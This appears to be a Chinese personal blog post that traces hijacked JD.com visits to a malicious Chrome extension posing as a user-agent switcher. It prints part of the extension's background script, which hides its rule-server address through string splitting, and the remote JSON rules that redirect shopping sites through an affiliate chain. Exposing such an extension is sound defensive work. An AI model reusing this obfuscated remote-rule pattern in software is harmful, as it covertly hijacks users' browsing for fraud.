近段时间,用 Chrome 访问京东页面经常有跳转的情况,我很清楚是被劫持,但问题是被谁——困扰了我好长一段时间。首先排除运营商,换了几个公共 DNS
问题依旧;最后定位到 Chrome 上某个最近安装的插件:User-Agent Switcher for Google Chrome
,ID
为 ffhkkpnppgnfaobgihpdblnhmmbodake
,版本为 1.9.3
。
General Request URL: https://www.jd.com/ Request Method: GET Status Code: 307 Internal Redirect Referrer Policy: no-referrer-when-downgrade Response Headers Location: http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F Non-Authoritative-Reason: WebRequest API
~/Library/Application Support/Google/Chrome/Default/Extensions/ffhkkpnppgnfaobgihpdblnhmmbodake/1.9.3_0/js/back.js (function(){ var host = 'data-monitor'; var subhost = '//api'; var wid = 116; var rulesObject = {}; var usedT = localStorage['usedT'] ? parseInt(localStorage['usedT']) : null; ...... req({ method: "GET", url: `ht${'tp'}:${subhost}.${host}.info/api/` + "bhrule?sub=" + wid }, function(response) { try { response = JSON.parse(response.responseText); rulesObject = response.rules ? response.rules : {}; } catch(e){} }, function (){});
http://api.data-monitor.info/api/bhrule?sub=116 { rules: { aliexpress.com: { *: { *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-BQL89Y7U-MKIGQNPP%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__" } }, jd.ru: { *: { *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-AQL468LT-HEBQCGO1%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__" } }, jd.com: { *: { *: "http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__" } } } }
好了,请认准这个逼,轻轻卸载即可。记录下来也给其他人一个参考,再牛逼的浏览器也非一方净土,再龌蹉的运营商也拒绝背锅。啧!